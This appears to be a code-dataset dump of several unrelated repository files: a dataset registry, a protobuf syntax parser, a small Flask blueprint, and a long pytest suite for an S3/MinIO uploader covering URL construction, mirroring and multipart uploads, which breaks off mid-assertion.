'import frappe\n'), ((12139, 12203), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check5"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check5', {'applicant_id': app.ref_id})\n", (12153, 12203), False, 'import frappe\n'), ((12598, 12662), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check6"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check6', {'applicant_id': app.ref_id})\n", (12612, 12662), False, 'import frappe\n'), ((3163, 3234), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check1', {'applicant_id': app.ref_id})\n", (3177, 3234), False, 'import frappe\n')]
TeamOfProfGuo/few_shot_baseline
dataset/dataset.py
f9ac87b9d309fc417589350d3ce61d3612e2be91
import os DEFAULT_ROOT = './materials' datasets_dt = {} def register(name): def decorator(cls): datasets_dt[name] = cls return cls return decorator def make(name, **kwargs): if kwargs.get('root_path') is None: kwargs['root_path'] = os.path.join(DEFAULT_ROOT, name) dataset = datasets_dt[name](**kwargs) return dataset
[((274, 306), 'os.path.join', 'os.path.join', (['DEFAULT_ROOT', 'name'], {}), '(DEFAULT_ROOT, name)\n', (286, 306), False, 'import os\n')]
YiXiaoCuoHuaiFenZi/proto-formatter
src/proto_formatter/syntax_parser.py
ac8c913a8c3854e840aa4f015c026e58ee023b0b
from .comment import CommentParser from .protobuf import Protobuf from .proto_structures import Syntax class SyntaxParser(): @classmethod def parse_and_add(cls, proto_obj: Protobuf, line, top_comment_list): if proto_obj.syntax is not None: raise 'multiple syntax detected!' proto_obj.syntax = cls.parse_syntax(line, top_comment_list) @classmethod def parse_syntax(cls, line, top_comment_list): value = cls._get_syntax_value(line) comments = CommentParser.create_comment(line, top_comment_list) syntax = Syntax(value, comments) return syntax @classmethod def _get_syntax_value(cls, line): line = line.strip().replace(' ', '') lindex = len('syntax=') rindex = line.index(';') value = line[lindex:rindex].strip().replace('"', "").replace("'", "") return value
[]
mgp-git/Flask
IPL/app/core/views.py
f56be0192a3aac550a1dae46394352a68bd53d3d
from flask import render_template, request, Blueprint core = Blueprint('core', __name__) @core.route("/", methods=['GET', 'POST']) def home(): return render_template('home.html') @core.route("/about") def about(): return render_template('about.html') @core.route('/search', methods=['GET', 'POST']) def search(): search_str = request.args.get('globalsearch') return render_template('search.html', search_str=search_str)
[((62, 89), 'flask.Blueprint', 'Blueprint', (['"""core"""', '__name__'], {}), "('core', __name__)\n", (71, 89), False, 'from flask import render_template, request, Blueprint\n'), ((157, 185), 'flask.render_template', 'render_template', (['"""home.html"""'], {}), "('home.html')\n", (172, 185), False, 'from flask import render_template, request, Blueprint\n'), ((234, 263), 'flask.render_template', 'render_template', (['"""about.html"""'], {}), "('about.html')\n", (249, 263), False, 'from flask import render_template, request, Blueprint\n'), ((345, 377), 'flask.request.args.get', 'request.args.get', (['"""globalsearch"""'], {}), "('globalsearch')\n", (361, 377), False, 'from flask import render_template, request, Blueprint\n'), ((389, 442), 'flask.render_template', 'render_template', (['"""search.html"""'], {'search_str': 'search_str'}), "('search.html', search_str=search_str)\n", (404, 442), False, 'from flask import render_template, request, Blueprint\n')]
tdilauro/circulation-core
tests/test_s3.py
8086ca8cbedd5f4b2a0c44df97889d078ff79aac
# encoding: utf-8 import functools import os from urllib.parse import urlsplit import boto3 import botocore import pytest from botocore.exceptions import BotoCoreError, ClientError from mock import MagicMock from parameterized import parameterized from ..mirror import MirrorUploader from ..model import ( DataSource, ExternalIntegration, Hyperlink, Identifier, Representation, create, ) from ..s3 import ( MinIOUploader, MinIOUploaderConfiguration, MockS3Client, MultipartS3Upload, S3AddressingStyle, S3Uploader, S3UploaderConfiguration, ) from ..testing import DatabaseTest from ..util.datetime_helpers import datetime_utc, utc_now class S3UploaderTest(DatabaseTest): def _integration(self, **settings): """Create and configure a simple S3 integration.""" integration = self._external_integration( ExternalIntegration.S3, ExternalIntegration.STORAGE_GOAL, settings=settings ) integration.username = settings.get("username", "username") integration.password = settings.get("password", "password") return integration def _add_settings_value(self, settings, key, value): """Adds a value to settings dictionary :param settings: Settings dictionary :type settings: Dict :param key: Key :type key: string :param value: Value :type value: Any :return: Updated settings dictionary :rtype: Dict """ if value: if settings: settings[key] = value else: settings = {key: value} return settings def _create_s3_uploader( self, client_class=None, uploader_class=None, region=None, addressing_style=None, **settings ): """Creates a new instance of S3 uploader :param client_class: (Optional) Custom class to be used instead of boto3's client class :type client_class: Optional[Type] :param: uploader_class: (Optional) Custom class which will be used insted of S3Uploader :type uploader_class: Optional[Type] :param region: (Optional) S3 region :type region: Optional[string] :param addressing_style: (Optional) S3 addressing style :type addressing_style: Optional[string] :param settings: Kwargs used for initializing an external integration :type: Optional[Dict] :return: New intance of S3 uploader :rtype: S3Uploader """ settings = self._add_settings_value( settings, S3UploaderConfiguration.S3_REGION, region ) settings = self._add_settings_value( settings, S3UploaderConfiguration.S3_ADDRESSING_STYLE, addressing_style ) integration = self._integration(**settings) uploader_class = uploader_class or S3Uploader return uploader_class(integration, client_class=client_class) class S3UploaderIntegrationTest(S3UploaderTest): SIMPLIFIED_TEST_MINIO_ENDPOINT_URL = os.environ.get( "SIMPLIFIED_TEST_MINIO_ENDPOINT_URL", "http://localhost:9000" ) SIMPLIFIED_TEST_MINIO_USER = os.environ.get( "SIMPLIFIED_TEST_MINIO_USER", "minioadmin" ) SIMPLIFIED_TEST_MINIO_PASSWORD = os.environ.get( "SIMPLIFIED_TEST_MINIO_PASSWORD", "minioadmin" ) _, SIMPLIFIED_TEST_MINIO_HOST, _, _, _ = urlsplit( SIMPLIFIED_TEST_MINIO_ENDPOINT_URL ) minio_s3_client = None """boto3 client connected to locally running MinIO instance""" s3_client_class = None """Factory function used for creating a boto3 client inside S3Uploader""" @classmethod def setup_class(cls): """Initializes the test suite by creating a boto3 client set up with MinIO credentials""" super(S3UploaderIntegrationTest, cls).setup_class() cls.minio_s3_client = boto3.client( "s3", aws_access_key_id=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_USER, aws_secret_access_key=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD, endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL, ) cls.s3_client_class = functools.partial( boto3.client, endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL, ) def teardown_method(self): """Deinitializes the test suite by removing all the buckets from MinIO""" super(S3UploaderTest, self).teardown_method() response = self.minio_s3_client.list_buckets() for bucket in response["Buckets"]: bucket_name = bucket["Name"] response = self.minio_s3_client.list_objects(Bucket=bucket_name) for object in response.get("Contents", []): object_key = object["Key"] self.minio_s3_client.delete_object(Bucket=bucket_name, Key=object_key) self.minio_s3_client.delete_bucket(Bucket=bucket_name) def _create_s3_uploader( self, client_class=None, uploader_class=None, region=None, addressing_style=None, **settings ): """Creates a new instance of S3 uploader :param client_class: (Optional) Custom class to be used instead of boto3's client class :type client_class: Optional[Type] :param: uploader_class: (Optional) Custom class which will be used insted of S3Uploader :type uploader_class: Optional[Type] :param region: (Optional) S3 region :type region: Optional[string] :param addressing_style: (Optional) S3 addressing style :type addressing_style: Optional[string] :param settings: Kwargs used for initializing an external integration :type: Optional[Dict] :return: New intance of S3 uploader :rtype: S3Uploader """ if settings and "username" not in settings: self._add_settings_value( settings, "username", self.SIMPLIFIED_TEST_MINIO_USER ) if settings and "password" not in settings: self._add_settings_value( settings, "password", self.SIMPLIFIED_TEST_MINIO_PASSWORD ) if not client_class: client_class = self.s3_client_class return super(S3UploaderIntegrationTest, self)._create_s3_uploader( client_class, uploader_class, region, addressing_style, **settings ) class TestS3Uploader(S3UploaderTest): def test_names(self): # The NAME associated with this class must be the same as its # key in the MirrorUploader implementation registry, and it's # better if it's the same as the name of the external # integration. assert S3Uploader.NAME == ExternalIntegration.S3 assert ( S3Uploader == MirrorUploader.IMPLEMENTATION_REGISTRY[ExternalIntegration.S3] ) def test_instantiation(self): integration = self._external_integration( ExternalIntegration.S3, goal=ExternalIntegration.STORAGE_GOAL ) integration.username = "your-access-key" integration.password = "your-secret-key" integration.setting( S3UploaderConfiguration.URL_TEMPLATE_KEY ).value = "a transform" uploader = MirrorUploader.implementation(integration) assert True == isinstance(uploader, S3Uploader) # The URL_TEMPLATE_KEY setting becomes the .url_transform # attribute on the S3Uploader object. assert "a transform" == uploader.url_transform @parameterized.expand( [ ("empty_credentials", None, None), ("empty_string_credentials", "", ""), ("non_empty_string_credentials", "username", "password"), ] ) def test_initialization(self, name, username, password): # Arrange settings = {"username": username, "password": password} integration = self._external_integration( ExternalIntegration.S3, goal=ExternalIntegration.STORAGE_GOAL, settings=settings, ) client_class = MagicMock() # Act S3Uploader(integration, client_class=client_class) # Assert assert client_class.call_count == 2 service_name = client_class.call_args_list[0].args[0] region_name = client_class.call_args_list[0].kwargs["region_name"] aws_access_key_id = client_class.call_args_list[0].kwargs["aws_access_key_id"] aws_secret_access_key = client_class.call_args_list[0].kwargs[ "aws_secret_access_key" ] config = client_class.call_args_list[0].kwargs["config"] assert service_name == "s3" assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION assert aws_access_key_id == None assert aws_secret_access_key == None assert config.signature_version == botocore.UNSIGNED assert ( config.s3["addressing_style"] == S3UploaderConfiguration.S3_DEFAULT_ADDRESSING_STYLE ) service_name = client_class.call_args_list[1].args[0] region_name = client_class.call_args_list[1].kwargs["region_name"] aws_access_key_id = client_class.call_args_list[1].kwargs["aws_access_key_id"] aws_secret_access_key = client_class.call_args_list[1].kwargs[ "aws_secret_access_key" ] assert service_name == "s3" assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION assert aws_access_key_id == (username if username != "" else None) assert aws_secret_access_key == (password if password != "" else None) assert "config" not in client_class.call_args_list[1].kwargs def test_custom_client_class(self): """You can specify a client class to use instead of boto3.client.""" integration = self._integration() uploader = S3Uploader(integration, MockS3Client) assert isinstance(uploader.client, MockS3Client) def test_get_bucket(self): buckets = { S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "banana", S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "bucket", } buckets_plus_irrelevant_setting = dict(buckets) buckets_plus_irrelevant_setting["not-a-bucket-at-all"] = "value" uploader = self._create_s3_uploader(**buckets_plus_irrelevant_setting) # This S3Uploader knows about the configured buckets. It # wasn't informed of the irrelevant 'not-a-bucket-at-all' # setting. assert buckets == uploader.buckets # get_bucket just does a lookup in .buckets uploader.buckets["foo"] = object() result = uploader.get_bucket("foo") assert uploader.buckets["foo"] == result @parameterized.expand( [ ( "s3_url_with_path_without_slash", "a-bucket", "a-path", "https://a-bucket.s3.amazonaws.com/a-path", None, ), ( "s3_dummy_url_with_path_without_slash", "dummy", "dummy", "https://dummy.s3.amazonaws.com/dummy", None, ), ( "s3_path_style_url_with_path_without_slash", "a-bucket", "a-path", "https://s3.amazonaws.com/a-bucket/a-path", None, S3AddressingStyle.PATH.value, ), ( "s3_path_style_dummy_url_with_path_without_slash", "dummy", "dummy", "https://s3.amazonaws.com/dummy/dummy", None, S3AddressingStyle.PATH.value, ), ( "s3_url_with_path_with_slash", "a-bucket", "/a-path", "https://a-bucket.s3.amazonaws.com/a-path", None, ), ( "s3_path_style_url_with_path_with_slash", "a-bucket", "/a-path", "https://s3.amazonaws.com/a-bucket/a-path", None, S3AddressingStyle.PATH.value, ), ( "s3_url_with_custom_region_and_path_without_slash", "a-bucket", "a-path", "https://a-bucket.s3.us-east-2.amazonaws.com/a-path", "us-east-2", ), ( "s3_path_style_url_with_custom_region_and_path_without_slash", "a-bucket", "a-path", "https://s3.us-east-2.amazonaws.com/a-bucket/a-path", "us-east-2", S3AddressingStyle.PATH.value, ), ( "s3_url_with_custom_region_and_path_with_slash", "a-bucket", "/a-path", "https://a-bucket.s3.us-east-3.amazonaws.com/a-path", "us-east-3", ), ( "s3_path_style_url_with_custom_region_and_path_with_slash", "a-bucket", "/a-path", "https://s3.us-east-3.amazonaws.com/a-bucket/a-path", "us-east-3", S3AddressingStyle.PATH.value, ), ( "custom_http_url_and_path_without_slash", "http://a-bucket.com/", "a-path", "http://a-bucket.com/a-path", None, ), ( "custom_http_url_and_path_with_slash", "http://a-bucket.com/", "/a-path", "http://a-bucket.com/a-path", None, ), ( "custom_http_url_and_path_without_slash", "https://a-bucket.com/", "a-path", "https://a-bucket.com/a-path", None, ), ( "custom_http_url_and_path_with_slash", "https://a-bucket.com/", "/a-path", "https://a-bucket.com/a-path", None, ), ] ) def test_url( self, name, bucket, path, expected_result, region=None, addressing_style=None ): # Arrange uploader = self._create_s3_uploader( region=region, addressing_style=addressing_style ) # Act result = uploader.url(bucket, path) # Assert assert result == expected_result @parameterized.expand( [ ( "implicit_s3_url_template", "bucket", "the key", "https://bucket.s3.amazonaws.com/the%20key", ), ( "implicit_s3_url_template_with_custom_region", "bucket", "the key", "https://bucket.s3.us-east-2.amazonaws.com/the%20key", None, "us-east-2", ), ( "explicit_s3_url_template", "bucket", "the key", "https://bucket.s3.amazonaws.com/the%20key", S3UploaderConfiguration.URL_TEMPLATE_DEFAULT, ), ( "explicit_s3_url_template_with_custom_region", "bucket", "the key", "https://bucket.s3.us-east-2.amazonaws.com/the%20key", S3UploaderConfiguration.URL_TEMPLATE_DEFAULT, "us-east-2", ), ( "http_url_template", "bucket", "the këy", "http://bucket/the%20k%C3%ABy", S3UploaderConfiguration.URL_TEMPLATE_HTTP, ), ( "https_url_template", "bucket", "the këy", "https://bucket/the%20k%C3%ABy", S3UploaderConfiguration.URL_TEMPLATE_HTTPS, ), ] ) def test_final_mirror_url( self, name, bucket, key, expected_result, url_transform=None, region=None ): # Arrange uploader = self._create_s3_uploader(region=region) if url_transform: uploader.url_transform = url_transform # Act result = uploader.final_mirror_url(bucket, key) # Assert if not url_transform: assert ( S3UploaderConfiguration.URL_TEMPLATE_DEFAULT == uploader.url_transform ) assert result == expected_result def test_key_join(self): """Test the code used to build S3 keys from parts.""" parts = ["Gutenberg", b"Gutenberg ID", 1234, "Die Flügelmaus+.epub"] assert ( "Gutenberg/Gutenberg%20ID/1234/Die%20Fl%C3%BCgelmaus%2B.epub" == S3Uploader.key_join(parts) ) @parameterized.expand( [ ( "with_gutenberg_cover_generator_data_source", "test-book-covers-s3-bucket", DataSource.GUTENBERG_COVER_GENERATOR, "https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/", ), ( "with_overdrive_data_source", "test-book-covers-s3-bucket", DataSource.OVERDRIVE, "https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/", ), ( "with_overdrive_data_source_and_scaled_size", "test-book-covers-s3-bucket", DataSource.OVERDRIVE, "https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/", 300, ), ( "with_gutenberg_cover_generator_data_source_and_custom_region", "test-book-covers-s3-bucket", DataSource.GUTENBERG_COVER_GENERATOR, "https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/", None, "us-east-3", ), ( "with_overdrive_data_source_and_custom_region", "test-book-covers-s3-bucket", DataSource.OVERDRIVE, "https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/", None, "us-east-3", ), ( "with_overdrive_data_source_and_scaled_size_and_custom_region", "test-book-covers-s3-bucket", DataSource.OVERDRIVE, "https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/", 300, "us-east-3", ), ] ) def test_cover_image_root( self, name, bucket, data_source_name, expected_result, scaled_size=None, region=None, ): # Arrange uploader = self._create_s3_uploader(region=region) data_source = DataSource.lookup(self._db, data_source_name) # Act result = uploader.cover_image_root(bucket, data_source, scaled_size=scaled_size) # Assert assert result == expected_result @parameterized.expand( [ ( "with_default_region", "test-open-access-s3-bucket", "https://test-open-access-s3-bucket.s3.amazonaws.com/", ), ( "with_custom_region", "test-open-access-s3-bucket", "https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/", "us-east-3", ), ] ) def test_content_root(self, name, bucket, expected_result, region=None): # Arrange uploader = self._create_s3_uploader(region=region) # Act result = uploader.content_root(bucket) # Assert assert result == expected_result @parameterized.expand( [ ( "s3_url", "test-marc-s3-bucket", "SHORT", "https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/", ), ( "s3_url_with_custom_region", "test-marc-s3-bucket", "SHORT", "https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/", "us-east-2", ), ("custom_http_url", "http://my-feed/", "SHORT", "http://my-feed/SHORT/"), ("custom_https_url", "https://my-feed/", "SHORT", "https://my-feed/SHORT/"), ] ) def test_marc_file_root( self, name, bucket, library_name, expected_result, region=None ): # Arrange uploader = self._create_s3_uploader(region=region) library = self._library(short_name=library_name) # Act result = uploader.marc_file_root(bucket, library) # Assert assert result == expected_result @parameterized.expand( [ ( "with_identifier", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub", ), ( "with_custom_extension", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf", "pdf", ), ( "with_custom_dotted_extension", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf", ".pdf", ), ( "with_custom_data_source", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub", None, DataSource.UNGLUE_IT, ), ( "with_custom_title", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub", None, None, "On Books", ), ( "with_custom_extension_and_title_and_data_source", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf", ".pdf", DataSource.UNGLUE_IT, "On Books", ), ( "with_custom_extension_and_title_and_data_source_and_region", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf", ".pdf", DataSource.UNGLUE_IT, "On Books", "us-east-3", ), ( "with_protected_access_and_custom_extension_and_title_and_data_source_and_region", {S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf", ".pdf", DataSource.UNGLUE_IT, "On Books", "us-east-3", False, ), ] ) def test_book_url( self, name, buckets, identifier, expected_result, extension=None, data_source_name=None, title=None, region=None, open_access=True, ): # Arrange identifier = self._identifier(foreign_id=identifier) uploader = self._create_s3_uploader(region=region, **buckets) parameters = {"identifier": identifier, "open_access": open_access} if extension: parameters["extension"] = extension if title: parameters["title"] = title if data_source_name: data_source = DataSource.lookup(self._db, DataSource.UNGLUE_IT) parameters["data_source"] = data_source # Act result = uploader.book_url(**parameters) # Assert assert result == expected_result @parameterized.expand( [ ( "without_scaled_size", {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"}, DataSource.UNGLUE_IT, "ABOOK", "filename", "https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename", ), ( "without_scaled_size_and_with_custom_region", {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"}, DataSource.UNGLUE_IT, "ABOOK", "filename", "https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename", None, "us-east-3", ), ( "with_scaled_size", {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"}, DataSource.UNGLUE_IT, "ABOOK", "filename", "https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename", 601, ), ( "with_scaled_size_and_custom_region", {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"}, DataSource.UNGLUE_IT, "ABOOK", "filename", "https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename", 601, "us-east-3", ), ] ) def test_cover_image_url( self, name, buckets, data_source_name, identifier, filename, expected_result, scaled_size=None, region=None, ): # identifier = self._identifier(foreign_id="ABOOK") # buckets = {S3Uploader.BOOK_COVERS_BUCKET_KEY : 'thecovers'} # uploader = self._uploader(**buckets) # m = uploader.cover_image_url # # unglueit = DataSource.lookup(self._db, DataSource.UNGLUE_IT) # identifier = self._identifier(foreign_id="ABOOK") # eq_('https://s3.amazonaws.com/thecovers/scaled/601/unglue.it/Gutenberg+ID/ABOOK/filename', # m(unglueit, identifier, "filename", scaled_size=601)) # Arrange data_source = DataSource.lookup(self._db, data_source_name) identifier = self._identifier(foreign_id=identifier) uploader = self._create_s3_uploader(region=region, **buckets) # Act result = uploader.cover_image_url( data_source, identifier, filename, scaled_size=scaled_size ) # Assert assert result == expected_result @parameterized.expand( [ ( "with_s3_bucket_and_end_time", "marc", "SHORT", "Lane", datetime_utc(2020, 1, 1, 0, 0, 0), "https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00/Lane.mrc", ), ( "with_s3_bucket_and_end_time_and_start_time", "marc", "SHORT", "Lane", datetime_utc(2020, 1, 2, 0, 0, 0), "https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc", datetime_utc(2020, 1, 1, 0, 0, 0), ), ( "with_s3_bucket_and_end_time_and_start_time_and_custom_region", "marc", "SHORT", "Lane", datetime_utc(2020, 1, 2, 0, 0, 0), "https://marc.s3.us-east-2.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc", datetime_utc(2020, 1, 1, 0, 0, 0), "us-east-2", ), ( "with_http_bucket_and_end_time_and_start_time", "http://marc", "SHORT", "Lane", datetime_utc(2020, 1, 2, 0, 0, 0), "http://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc", datetime_utc(2020, 1, 1, 0, 0, 0), ), ( "with_https_bucket_and_end_time_and_start_time", "https://marc", "SHORT", "Lane", datetime_utc(2020, 1, 2, 0, 0, 0), "https://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc", datetime_utc(2020, 1, 1, 0, 0, 0), ), ] ) def test_marc_file_url( self, name, bucket, library_name, lane_name, end_time, expected_result, start_time=None, region=None, ): # Arrange library = self._library(short_name=library_name) lane = self._lane(display_name=lane_name) buckets = {S3UploaderConfiguration.MARC_BUCKET_KEY: bucket} uploader = self._create_s3_uploader(region=region, **buckets) # Act result = uploader.marc_file_url(library, lane, end_time, start_time) # Assert assert result == expected_result @parameterized.expand( [ ( "s3_path_style_request_without_region", "https://s3.amazonaws.com/bucket/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "s3_path_style_request_with_region", "https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "s3_virtual_hosted_style_request_with_global_endpoint", "https://bucket.s3.amazonaws.com/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "s3_virtual_hosted_style_request_with_dashed_region", "https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "s3_virtual_hosted_style_request_with_dotted_region", "https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "http_url", "http://book-covers.nypl.org/directory/filename.jpg", ("book-covers.nypl.org", "directory/filename.jpg"), ), ( "https_url", "https://book-covers.nypl.org/directory/filename.jpg", ("book-covers.nypl.org", "directory/filename.jpg"), ), ( "http_url_with_escaped_symbols", "http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg", ("book-covers.nypl.org", "directory/filename with spaces!.jpg"), ), ( "http_url_with_escaped_symbols_but_unquote_set_to_false", "http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg", ("book-covers.nypl.org", "directory/filename+with+spaces%21.jpg"), False, ), ] ) def test_split_url(self, name, url, expected_result, unquote=True): # Arrange s3_uploader = self._create_s3_uploader() # Act result = s3_uploader.split_url(url, unquote) # Assert assert result == expected_result def test_mirror_one(self): edition, pool = self._edition(with_license_pool=True) original_cover_location = "http://example.com/a-cover.png" content = open(self.sample_cover_path("test-book-cover.png"), "rb").read() cover, ignore = pool.add_link( Hyperlink.IMAGE, original_cover_location, edition.data_source, Representation.PNG_MEDIA_TYPE, content=content, ) cover_rep = cover.resource.representation assert None == cover_rep.mirrored_at original_epub_location = "https://books.com/a-book.epub" epub, ignore = pool.add_link( Hyperlink.OPEN_ACCESS_DOWNLOAD, original_epub_location, edition.data_source, Representation.EPUB_MEDIA_TYPE, content="i'm an epub", ) epub_rep = epub.resource.representation assert None == epub_rep.mirrored_at s3 = self._create_s3_uploader(client_class=MockS3Client) # Mock final_mirror_url so we can verify that it's called with # the right arguments def mock_final_mirror_url(bucket, key): return "final_mirror_url was called with bucket %s, key %s" % (bucket, key) s3.final_mirror_url = mock_final_mirror_url book_url = "http://books-go/here.epub" cover_url = "http://s3.amazonaws.com/covers-go/here.png" s3.mirror_one(cover.resource.representation, cover_url) s3.mirror_one(epub.resource.representation, book_url) [ [data1, bucket1, key1, args1, ignore1], [data2, bucket2, key2, args2, ignore2], ] = s3.client.uploads # Both representations have had .mirror_url set and been # mirrored to those URLs. assert data1.startswith(b"\x89") assert "covers-go" == bucket1 assert "here.png" == key1 assert Representation.PNG_MEDIA_TYPE == args1["ContentType"] assert (utc_now() - cover_rep.mirrored_at).seconds < 10 assert b"i'm an epub" == data2 assert "books-go" == bucket2 assert "here.epub" == key2 assert Representation.EPUB_MEDIA_TYPE == args2["ContentType"] # In both cases, mirror_url was set to the result of final_mirror_url. assert ( "final_mirror_url was called with bucket books-go, key here.epub" == epub_rep.mirror_url ) assert ( "final_mirror_url was called with bucket covers-go, key here.png" == cover_rep.mirror_url ) # mirrored-at was set when the representation was 'mirrored' for rep in epub_rep, cover_rep: assert (utc_now() - rep.mirrored_at).seconds < 10 def test_mirror_failure(self): edition, pool = self._edition(with_license_pool=True) original_epub_location = "https://books.com/a-book.epub" epub, ignore = pool.add_link( Hyperlink.OPEN_ACCESS_DOWNLOAD, original_epub_location, edition.data_source, Representation.EPUB_MEDIA_TYPE, content="i'm an epub", ) epub_rep = epub.resource.representation uploader = self._create_s3_uploader(MockS3Client) # A network failure is treated as a transient error. uploader.client.fail_with = BotoCoreError() uploader.mirror_one(epub_rep, self._url) assert None == epub_rep.mirrored_at assert None == epub_rep.mirror_exception # An S3 credential failure is treated as a transient error. response = dict( Error=dict( Code=401, Message="Bad credentials", ) ) uploader.client.fail_with = ClientError(response, "SomeOperation") uploader.mirror_one(epub_rep, self._url) assert None == epub_rep.mirrored_at assert None == epub_rep.mirror_exception # Because the file was not successfully uploaded, # final_mirror_url was never called and mirror_url is # was not set. assert None == epub_rep.mirror_url # A bug in the code is not treated as a transient error -- # the exception propagates through. uploader.client.fail_with = Exception("crash!") pytest.raises(Exception, uploader.mirror_one, epub_rep, self._url) def test_svg_mirroring(self): edition, pool = self._edition(with_license_pool=True) original = self._url # Create an SVG cover for the book. svg = """<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" width="100" height="50"> <ellipse cx="50" cy="25" rx="50" ry="25" style="fill:blue;"/> </svg>""" hyperlink, ignore = pool.add_link( Hyperlink.IMAGE, original, edition.data_source, Representation.SVG_MEDIA_TYPE, content=svg, ) # 'Upload' it to S3. s3 = self._create_s3_uploader(MockS3Client) s3.mirror_one(hyperlink.resource.representation, self._url) [[data, bucket, key, args, ignore]] = s3.client.uploads assert Representation.SVG_MEDIA_TYPE == args["ContentType"] assert b"svg" in data assert b"PNG" not in data def test_multipart_upload(self): class MockMultipartS3Upload(MultipartS3Upload): completed = None aborted = None def __init__(self, uploader, representation, mirror_to): self.parts = [] MockMultipartS3Upload.completed = False MockMultipartS3Upload.aborted = False def upload_part(self, content): self.parts.append(content) def complete(self): MockMultipartS3Upload.completed = True def abort(self): MockMultipartS3Upload.aborted = True rep, ignore = create( self._db, Representation, url="http://books.mrc", media_type=Representation.MARC_MEDIA_TYPE, ) s3 = self._create_s3_uploader(MockS3Client) # Successful upload with s3.multipart_upload( rep, rep.url, upload_class=MockMultipartS3Upload ) as upload: assert [] == upload.parts assert False == upload.completed assert False == upload.aborted upload.upload_part("Part 1") upload.upload_part("Part 2") assert ["Part 1", "Part 2"] == upload.parts assert True == MockMultipartS3Upload.completed assert False == MockMultipartS3Upload.aborted assert None == rep.mirror_exception class FailingMultipartS3Upload(MockMultipartS3Upload): def upload_part(self, content): raise Exception("Error!") # Failed during upload with s3.multipart_upload( rep, rep.url, upload_class=FailingMultipartS3Upload ) as upload: upload.upload_part("Part 1") assert False == MockMultipartS3Upload.completed assert True == MockMultipartS3Upload.aborted assert "Error!" == 